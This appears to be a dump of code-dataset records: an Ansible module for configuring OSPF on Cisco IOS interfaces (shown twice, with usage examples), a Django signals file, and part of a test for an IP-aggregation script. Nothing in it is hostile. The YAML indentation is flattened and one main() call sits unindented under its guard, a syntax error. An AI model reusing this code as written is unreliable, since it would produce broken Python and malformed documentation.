# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# interface GigabitEthernet0/2
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/0
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_ospf_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# },
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
after:
description: The resulting configuration model invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface GigabitEthernet0/1', 'ip ospf 10 area 30', 'ip ospf cost 5', 'ip ospf priority 25']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.ospf_interfaces.ospf_interfaces import (
Ospf_InterfacesArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.ospf_interfaces.ospf_interfaces import (
Ospf_Interfaces,
)
def main():
    """Entry point for the ios_ospf_interfaces module.

    Builds the AnsibleModule with the resource argspec and state
    constraints, runs the Ospf_Interfaces config handler, and exits
    with its result.

    :returns: the result from module invocation
    """
    # Every write-style state needs `config`; `parsed` needs `running_config`
    # instead, and the two inputs are mutually exclusive.
    module = AnsibleModule(
        argument_spec=Ospf_InterfacesArgs.argument_spec,
        required_if=[
            ("state", "merged", ("config",)),
            ("state", "replaced", ("config",)),
            ("state", "overridden", ("config",)),
            ("state", "rendered", ("config",)),
            ("state", "parsed", ("running_config",)),
        ],
        mutually_exclusive=[("config", "running_config")],
        supports_check_mode=True,
    )
    module.exit_json(**Ospf_Interfaces(module).execute_module())


if __name__ == "__main__":
    main()
| 31.5 | 116 | 0.539913 | #!/usr/bin/python
#
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for ios_ospf_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_ospf_interfaces
short_description: OSPF_Interfaces resource module
description: This module configures and manages the Open Shortest Path First (OSPF)
version 2 on IOS platforms.
version_added: 1.0.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL.
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A dictionary of OSPF interfaces options.
type: list
elements: dict
suboptions:
name:
description:
- Full name of the interface excluding any logical unit number,
i.e. GigabitEthernet0/1.
type: str
required: true
address_family:
description:
- OSPF interfaces settings on the interfaces in address-family
context.
type: list
elements: dict
suboptions:
afi:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces.
type: str
choices:
- ipv4
- ipv6
required: true
process:
description: OSPF interfaces process config
type: dict
suboptions:
id:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces. Please refer vendor documentation of Valid
values.
type: int
area_id:
description:
- OSPF interfaces area ID as a decimal value. Please
refer vendor documentation of Valid values.
- OSPF interfaces area ID in IP address format(e.g.
A.B.C.D)
type: str
secondaries:
description:
- Include or exclude secondary IP addresses.
- Valid only with IPv4 config
type: bool
instance_id:
description:
- Set the OSPF instance based on ID
- Valid only with IPv6 OSPF config
type: int
adjacency:
description: Adjacency staggering
type: bool
authentication:
description: Enable authentication
type: dict
suboptions:
key_chain:
description: Use a key-chain for cryptographic
authentication keys
type: str
message_digest:
description: Use message-digest authentication
type: bool
'null':
description: Use no authentication
type: bool
bfd:
description:
- BFD configuration commands
- Enable/Disable BFD on this interface
type: bool
cost:
description: Interface cost
type: dict
suboptions:
interface_cost:
description: Interface cost or Route cost of this interface
type: int
dynamic_cost:
description:
- Specify dynamic cost options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
default:
description: Specify default link metric value
type: int
hysteresis:
description: Specify hysteresis value for LSA dampening
type: dict
suboptions:
percent:
description: Specify hysteresis percent changed.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Specify hysteresis threshold value.
Please refer vendor documentation of Valid values.
type: int
weight:
description: Specify weight to be placed on individual
metrics
type: dict
suboptions:
l2_factor:
description:
- Specify weight to be given to L2-factor metric
- Percentage weight of L2-factor metric. Please refer
vendor documentation of Valid values.
type: int
latency:
description:
- Specify weight to be given to latency metric.
- Percentage weight of latency metric. Please refer
vendor documentation of Valid values.
type: int
oc:
description:
- Specify weight to be given to cdr/mdr for oc
- Give 100 percent weightage for current data rate(0
for maxdatarate)
type: bool
resources:
description:
- Specify weight to be given to resources metric
- Percentage weight of resources metric. Please refer
vendor documentation of Valid values.
type: int
throughput:
description:
- Specify weight to be given to throughput metric
- Percentage weight of throughput metric. Please refer
vendor documentation of Valid values.
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding
type: bool
dead_interval:
description: Interval after which a neighbor is declared dead
type: dict
suboptions:
time:
description: time in seconds
type: int
minimal:
description:
- Set to 1 second and set multiplier for Hellos
- Number of Hellos sent within 1 second. Please refer
vendor documentation of Valid values.
- Valid only with IP OSPF config
type: int
demand_circuit:
description: OSPF Demand Circuit, enable or disable
the demand circuit'
type: dict
suboptions:
enable:
description: Enable Demand Circuit
type: bool
ignore:
description: Ignore demand circuit auto-negotiation requests
type: bool
disable:
description:
- Disable demand circuit on this interface
- Valid only with IPv6 OSPF config
type: bool
flood_reduction:
description: OSPF Flood Reduction
type: bool
hello_interval:
description:
- Time between HELLO packets
- Please refer vendor documentation of Valid values.
type: int
lls:
description:
- Link-local Signaling (LLS) support
- Valid only with IP OSPF config
type: bool
manet:
description:
- Mobile Adhoc Networking options
- MANET Peering options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
cost:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
percent:
description: Relative incremental path cost.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Absolute incremental path cost.
Please refer vendor documentation of Valid values.
type: int
link_metrics:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
set:
description: Enable link-metrics
type: bool
cost_threshold:
description: Minimum link cost threshold.
Please refer vendor documentation of Valid values.
type: int
mtu_ignore:
description: Ignores the MTU in DBD packets
type: bool
multi_area:
description:
- Set the OSPF multi-area ID
- Valid only with IP OSPF config
type: dict
suboptions:
id:
description:
- OSPF multi-area ID as a decimal value. Please refer vendor
documentation of Valid values.
- OSPF multi-area ID in IP address format(e.g. A.B.C.D)
type: int
cost:
description: Interface cost
type: int
neighbor:
description:
- OSPF neighbor link-local IPv6 address (X:X:X:X::X)
- Valid only with IPv6 OSPF config
type: dict
suboptions:
address:
description: Neighbor link-local IPv6 address
type: str
cost:
description: OSPF cost for point-to-multipoint neighbor
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding for point-to-multipoint neighbor
type: bool
poll_interval:
description: OSPF dead-router polling interval
type: int
priority:
description: OSPF priority of non-broadcast neighbor
type: int
network:
description: Network type
type: dict
suboptions:
broadcast:
description: Specify OSPF broadcast multi-access network
type: bool
manet:
description:
- Specify MANET OSPF interface type
- Valid only with IPv6 OSPF config
type: bool
non_broadcast:
description: Specify OSPF NBMA network
type: bool
point_to_multipoint:
description: Specify OSPF point-to-multipoint network
type: bool
point_to_point:
description: Specify OSPF point-to-point network
type: bool
prefix_suppression:
description: Enable/Disable OSPF prefix suppression
type: bool
priority:
description: Router priority. Please refer vendor documentation
of Valid values.
type: int
resync_timeout:
description: Interval after which adjacency is reset if oob-resync
is not started. Please refer vendor documentation of Valid values.
type: int
retransmit_interval:
description: Time between retransmitting lost link state
advertisements. Please refer vendor documentation of Valid values.
type: int
shutdown:
description: Set OSPF protocol's state to disable under
current interface
type: bool
transmit_delay:
description: Link state transmit delay.
Please refer vendor documentation of Valid values.
type: int
ttl_security:
description:
- TTL security check
- Valid only with IPV4 OSPF config
type: dict
suboptions:
set:
description: Enable TTL Security on all interfaces
type: bool
hops:
description:
- Maximum number of IP hops allowed
- Please refer vendor documentation of Valid values.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS
device by executing the command B(sh running-config | section
^interface).
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into Ansible structured data as per the
resource module's argspec and the value is then returned in the
I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
- The states I(rendered), I(gathered) and I(parsed) does not perform any
change on the device.
- The state I(rendered) will transform the configuration in C(config)
option to platform specific CLI commands which will be returned in the
I(rendered) key within the result. For state I(rendered) active
connection to remote host is not required.
- The state I(gathered) will fetch the running configuration from device
and transform it into structured data in the format as per the resource
module argspec and the value is returned in the I(gathered) key within
the result.
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into JSON format as per the resource module
parameters and the value is returned in the I(parsed) key within the
result. The value of C(running_config) option should be the same format
as the output of command I(show running-config | include ip route|ipv6
route) executed on device. For state I(parsed) active connection to
remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using deleted
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete provided OSPF Interface config
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using deleted without any config passed (NOTE: This will delete all OSPF Interfaces configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete all OSPF config from interfaces
cisco.ios.ios_ospf_interfaces:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "no ip ospf 10 area 20",
# "no ip ospf adjacency stagger disable",
# "no ip ospf cost 30",
# "no ip ospf priority 40",
# "no ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# router-ios#
- name: Merge provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Override provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
- name: GigabitEthernet0/2
address_family:
- afi: ipv4
process:
id: 10
area_id: 20
adjacency: true
cost:
interface_cost: 30
priority: 40
ttl_security:
hops: 50
state: overridden
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "ip ospf 10 area 20",
# "ip ospf adjacency stagger disable",
# "ip ospf cost 30",
# "ip ospf priority 40",
# "ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "ipv6 ospf 55 area 105",
# "no ipv6 ospf database-filter all out",
# "no ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30",
# "no ip ospf 10 area 30",
# "no ip ospf adjacency stagger disable",
# "no ip ospf bfd",
# "no ip ospf cost 5",
# "no ip ospf dead-interval 5",
# "no ip ospf demand-circuit ignore",
# "no ip ospf network broadcast",
# "no ip ospf priority 25",
# "no ip ospf resync-timeout 10",
# "no ip ospf shutdown",
# "no ip ospf ttl-security hops 50"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Replaced provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/2
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "interface GigabitEthernet0/2",
# "ipv6 ospf 55 area 105",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Gather OSPF Interfaces provided configurations
cisco.ios.ios_ospf_interfaces:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# interface GigabitEthernet0/2
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/0
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_ospf_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# },
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
after:
description: The resulting configuration model invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface GigabitEthernet0/1', 'ip ospf 10 area 30', 'ip ospf cost 5', 'ip ospf priority 25']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.ospf_interfaces.ospf_interfaces import (
Ospf_InterfacesArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.ospf_interfaces.ospf_interfaces import (
Ospf_Interfaces,
)
def main():
    """
    Main entry point for module execution

    :returns: the result from module invocation
    """
    # Options that become mandatory for a given value of ``state``.
    required_if = [
        ("state", "merged", ("config",)),
        ("state", "replaced", ("config",)),
        ("state", "overridden", ("config",)),
        ("state", "rendered", ("config",)),
        ("state", "parsed", ("running_config",)),
    ]
    # ``config`` (structured input) and ``running_config`` (raw CLI text)
    # are alternative input sources and may not be combined.
    mutually_exclusive = [("config", "running_config")]
    module = AnsibleModule(
        argument_spec=Ospf_InterfacesArgs.argument_spec,
        required_if=required_if,
        mutually_exclusive=mutually_exclusive,
        supports_check_mode=True,
    )
    # Compute (and, outside check mode, apply) the configuration changes.
    result = Ospf_Interfaces(module).execute_module()
    module.exit_json(**result)
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
0eae48e5f8713faeacc100a4a7e5283ac3ec081e | 99 | py | Python | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | from django.dispatch import Signal
# Custom signal fired when a user logs in; receivers get the user instance
# and the triggering request.
# NOTE(review): ``providing_args`` is purely documentary and was deprecated
# in Django 3.0 and removed in Django 4.0 -- newer Django needs ``Signal()``.
user_logged_in = Signal(providing_args=['instance', 'request'])
| 33 | 63 | 0.79798 | from django.dispatch import Signal
# Custom signal fired when a user logs in; receivers get the user instance
# and the triggering request.
# NOTE(review): ``providing_args`` is purely documentary and was deprecated
# in Django 3.0 and removed in Django 4.0 -- newer Django needs ``Signal()``.
user_logged_in = Signal(providing_args=['instance', 'request'])
| 0 | 0 | 0 |
ecbb189108b2c5bba0a3e02d2c409f2c25703ac8 | 1,111 | py | Python | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import demistomock as demisto # noqa
import ExpanseAggregateAttributionIP
# Raw sighting events fed to the aggregation: the source IP may appear
# under either the ``src`` or ``src_ip`` key, with an optional ``count``.
INPUT = [
    {"src": "1.1.1.1", "count": 2},
    {"src_ip": "8.8.8.8"},
    {"src": "8.8.8.8", "count": 10}
]
# Previously aggregated state that the new events are merged into.
CURRENT = [
    {"ip": "1.1.1.1", "sightings": 1, "internal": False}
]
# Expected aggregation after merging INPUT into CURRENT: sightings are
# summed per IP, and ``internal`` reflects membership in the configured
# internal networks (8.0.0.0/8 covers 8.8.8.8).
RESULT = [
    {"ip": "1.1.1.1", "sightings": 3, "internal": False},
    {"ip": "8.8.8.8", "sightings": 11, "internal": True}
]
def test_aggregate_command():
    """
    Merging new IP sightings into previously aggregated data.

    Given:
    - a previous list of aggregated IPs
    - a new data source with IP/sightings information
    - a list of internal IP networks
    When
    - merging the new sightings into the existing aggregated data
    Then
    - the data is merged and the expected output is returned
    """
    args = {
        'input': INPUT,
        'current': CURRENT,
        'internal_ip_networks': "192.168.0.0/16,10.0.0.0/8,8.0.0.0/8",
    }
    command_results = ExpanseAggregateAttributionIP.aggregate_command(args)
    assert command_results.outputs_prefix == "Expanse.AttributionIP"
    assert command_results.outputs_key_field == "ip"
    assert command_results.outputs == RESULT
| 25.25 | 69 | 0.60216 | import demistomock as demisto # noqa
import ExpanseAggregateAttributionIP
# Raw sighting events fed to the aggregation: the source IP may appear
# under either the ``src`` or ``src_ip`` key, with an optional ``count``.
INPUT = [
    {"src": "1.1.1.1", "count": 2},
    {"src_ip": "8.8.8.8"},
    {"src": "8.8.8.8", "count": 10}
]
# Previously aggregated state that the new events are merged into.
CURRENT = [
    {"ip": "1.1.1.1", "sightings": 1, "internal": False}
]
# Expected aggregation after merging INPUT into CURRENT: sightings are
